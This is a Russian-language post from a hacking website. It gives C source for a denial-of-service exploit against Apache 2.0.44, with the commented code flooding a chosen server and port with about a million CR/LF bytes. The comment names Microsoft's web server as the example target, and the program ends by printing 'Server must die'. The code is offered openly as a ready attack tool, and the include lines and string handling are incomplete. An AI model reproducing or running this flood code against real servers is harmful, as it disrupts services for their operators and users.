Информация сайта компьютерной безопасности <<< Hack Style >>> /*Пример работы с сокетом на примере эксплойта на сервер типо Apache 2.0.44 что делает посылает на сервер 1000000 штук \n-ов тем самым засоряя его но можно и больше это на ваш вкус... сначала создает массив из 1000000 значений потом пробует подконнектиться к серверу к порту которые указываются как ключ при запуске проги например: exploit.exe www.microsoft.com 80 т.е. произойдет заброс 1000000 \n ов на порт 80 серва майкрософта обязательно для работы с сокетами подключение библиотеки wsock32.lib*/ #include #include int main(int argc, char *argv[]){//поехали if (argc < 3)//если мы не передали параметры { printf("\nApache 2.0.44 DoS exploit."); printf("\nUsage: %s \n\n", argv[0]); return -1; } int sockfd=0,count=0;//обьявление всех переменных char buffer[1000000];//массив struct sockaddr_in target; struct hostent *he; //ниже проверка на возможность создания соединения WSADATA wsaData; int error = WSAStartup(MAKEWORD( 2, 2 ), &wsaData ); if (error != 0 ) { printf("\n\aCould not find WinSock DLL"); return -1; } //далее printf("\nTH-Apache DoS\n"); printf("-------------\n"); printf("Starting...\n"); printf("\n"); //заполняем массив for (count = 0; count < 1000000;) { buffer[count] = '\r'; /* 0x0D */ count++; buffer[count] = '\n'; /* 0x0A */ count++; } //получаем IP адрес из названия сервера if ((he=gethostbyname(argv[1])) == NULL) { printf("gethostbyname() failed "); return -1; } memset(&target, 0, sizeof(target));//обнулим target.sin_family = AF_INET;//инет соединение target.sin_port = htons(atoi(argv[2]));//наш порт target.sin_addr = *((struct in_addr *)he->h_addr);//IP адрес printf("Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)//создаем сокет { printf("socket() failed "); return -1; } if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)//коннект сокета { printf("connect() failed "); return -1; } printf("Connected to %s:%d... Sending lines...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))//посылаем массив { printf("send() failed "); closesocket(sockfd);//закрываем сокет return -1; } closesocket(sockfd);//закрываем сокет WSACleanup();//освобождаем printf("Server must die !!!\n\n"); return 0; } Все права защищены ~< KAPMAH >~ www.HackStyle.narod.ru